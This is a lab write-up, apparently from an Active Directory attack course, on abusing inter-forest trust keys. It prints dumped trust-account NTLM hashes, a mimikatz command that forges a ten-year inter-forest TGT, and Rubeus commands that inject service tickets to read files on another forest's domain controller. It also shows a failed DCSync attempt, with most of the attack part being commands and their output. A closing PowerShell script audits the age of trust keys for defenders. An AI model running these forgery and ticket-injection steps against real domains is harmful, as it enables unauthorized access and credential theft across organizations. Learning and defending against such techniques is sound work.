Learning Objective - 20
Across Forest using Trust Tickets
We need the NTLM hash of the inter-forest trust account (the trust key); the dump below lists the trust accounts of dollarcorp.
SMB 172.16.2.1 445 DCORP-DC mcorp$:1103:aad3b435b51404eeaad3b435b51404ee:f5b5c9f1ca76187393db1d3bb8ded94e:::
SMB 172.16.2.1 445 DCORP-DC US$:1104:aad3b435b51404eeaad3b435b51404ee:f85385d81cc4936d37ff8f27813f43c6:::
SMB 172.16.2.1 445 DCORP-DC ecorp$:1112:aad3b435b51404eeaad3b435b51404ee:4501e4c7f30e1cb3c9886f06a3ed1c6a:::
Creating an inter-forest TGT (the trust ticket) with the ecorp$ trust key, targeting eurocorp.local.
C:\AD\Tools>mimikatz.exe "kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /rc4:4501e4c7f30e1cb3c9886f06a3ed1c6a /service:krbtgt /target:eurocorp.local /ticket:trust_forest_tkt.kirbi" "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /rc4:4501e4c7f30e1cb3c9886f06a3ed1c6a /service:krbtgt /target:eurocorp.local /ticket:trust_forest_tkt.kirbi
User : Administrator
Domain : dollarcorp.moneycorp.local (DOLLARCORP)
SID : S-1-5-21-719815819-3726368948-3917688648
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: 4501e4c7f30e1cb3c9886f06a3ed1c6a - rc4_hmac_nt
Service : krbtgt
Target : eurocorp.local
Lifetime : 3/4/2024 2:30:48 AM ; 3/2/2034 2:30:48 AM ; 3/2/2034 2:30:48 AM
-> Ticket : trust_forest_tkt.kirbi
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Final Ticket Saved to file !
mimikatz(commandline) # exit
Bye!
Then we use the forged trust ticket with Rubeus to request a service ticket for CIFS on the eurocorp DC and inject it into the current session (/ptt).
C:\AD\Tools>Rubeus.exe asktgs /ticket:trust_forest_tkt.kirbi /service:cifs/eurocorp-dc.eurocorp.local /dc:eurocorp-dc.eurocorp.local /ptt
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.1
[*] Action: Ask TGS
[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*] Building TGS-REQ request for: 'cifs/eurocorp-dc.eurocorp.local'
[*] Using domain controller: eurocorp-dc.eurocorp.local (172.16.15.1)
[+] TGS request successful!
[+] Ticket successfully imported!
[*] base64(ticket.kirbi):
ServiceName : cifs/eurocorp-dc.eurocorp.local
ServiceRealm : EUROCORP.LOCAL
UserName : Administrator
UserRealm : dollarcorp.moneycorp.local
StartTime : 3/4/2024 2:30:59 AM
EndTime : 3/4/2024 12:30:59 PM
RenewTill : 3/11/2024 3:30:59 AM
Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : oNlPdIgC24awtz+BVQX1wzqgdfUXi1Klpo/4OUzvhd8=
Now we can access the eurocorp DC over SMB, list the share and read the contents of secret.txt.
C:\AD\Tools>dir \\eurocorp-dc.eurocorp.local\SharedwithDCorp\
Volume in drive \\eurocorp-dc.eurocorp.local\SharedwithDCorp has no label.
Volume Serial Number is 1A5A-FDE2
Directory of \\eurocorp-dc.eurocorp.local\SharedwithDCorp
11/16/2022 04:26 AM <DIR> .
11/15/2022 06:17 AM 29 secret.txt
1 File(s) 29 bytes
1 Dir(s) 12,755,787,776 bytes free
C:\AD\Tools>type \\eurocorp-dc.eurocorp.local\SharedwithDCorp\secret.txt
Dollarcorp DAs can read this!
C:\AD\Tools>
DCSync
To attempt DCSync, we request a service ticket for the LDAP service on the eurocorp DC instead, using the same trust ticket.
C:\AD\Tools>Rubeus.exe asktgs /ticket:trust_forest_tkt.kirbi /service:ldap/eurocorp-dc.eurocorp.local /dc:eurocorp-dc.eurocorp.local /ptt
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.1
[*] Action: Ask TGS
[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*] Building TGS-REQ request for: 'ldap/eurocorp-dc.eurocorp.local'
[*] Using domain controller: eurocorp-dc.eurocorp.local (172.16.15.1)
[+] TGS request successful!
[+] Ticket successfully imported!
[*] base64(ticket.kirbi):
ServiceName : ldap/eurocorp-dc.eurocorp.local
ServiceRealm : EUROCORP.LOCAL
UserName : Administrator
UserRealm : dollarcorp.moneycorp.local
StartTime : 3/4/2024 2:37:28 AM
EndTime : 3/4/2024 12:37:28 PM
RenewTill : 3/11/2024 3:37:28 AM
Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : 7RXIWkPHMll2zs93v/FSfJsl/n7fGHeTVb81dL8iEy8=
It doesn't work and I don't know exactly why; it must be limited to certain queries.
C:\AD\Tools>mimikatz.exe "lsadump::dcsync /user:ecorp\Administrator /domain:eurocorp.local" "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # lsadump::dcsync /user:ecorp\Administrator /domain:eurocorp.local
[DC] 'eurocorp.local' will be the domain
[DC] 'eurocorp-dc.eurocorp.local' will be the DC server
[DC] 'ecorp\Administrator' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
ERROR kuhl_m_lsadump_dcsync ; GetNCChanges: 0x000020f7 (8439)
mimikatz(commandline) # exit
Bye!
C:\AD\Tools>
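From the defender's side, the whole chain above depends on one secret: the trust account's key. The following PowerShell audit is an added example, not part of the lab write-up; it lists the trusts of the current domain and the age of each trust account's password, so a stale key (and therefore a long-lived forged trust ticket like the 10-year one generated above) stands out. It assumes the ActiveDirectory RSAT module on a domain-joined host and a 30-day threshold that matches the default automatic rotation of trust passwords (assumed here, adjust to your policy).

```powershell
# Added defensive check (not from the lab): inventory trusts and trust-account key age.
# Assumptions: ActiveDirectory module available, run as any domain user.
Import-Module ActiveDirectory

$MaxTrustKeyAgeDays = 30   # assumed threshold; default trust password rotation interval

# 1. Trust relationships: direction and transitivity decide which way a forged
#    inter-realm TGT can be used, and whether the trust key is still RC4-only.
Get-ADTrust -Filter * |
    Select-Object Name, Direction, ForestTransitive, TrustType, UsesAESKeys |
    Format-Table -AutoSize

# 2. Trust accounts (samAccountType 805306370 = SAM_TRUST_ACCOUNT). Their NTLM hash
#    is the "trust key"; a ticket forged with it keeps working until that key is
#    rotated out, so an old pwdLastSet means a longer window for anyone holding it.
$now = Get-Date
Get-ADObject -LDAPFilter '(samAccountType=805306370)' -Properties pwdLastSet |
    ForEach-Object {
        $lastSet = [DateTime]::FromFileTime($_.pwdLastSet)
        $ageDays = [int]($now - $lastSet).TotalDays
        [PSCustomObject]@{
            TrustAccount    = $_.Name
            PasswordLastSet = $lastSet
            AgeDays         = $ageDays
            Stale           = ($ageDays -gt $MaxTrustKeyAgeDays)
        }
    } | Sort-Object AgeDays -Descending | Format-Table -AutoSize
```

Any account flagged Stale, or a trust without AES keys, is worth a closer look: both extend the usefulness of a stolen trust key such as the ecorp$ hash used above.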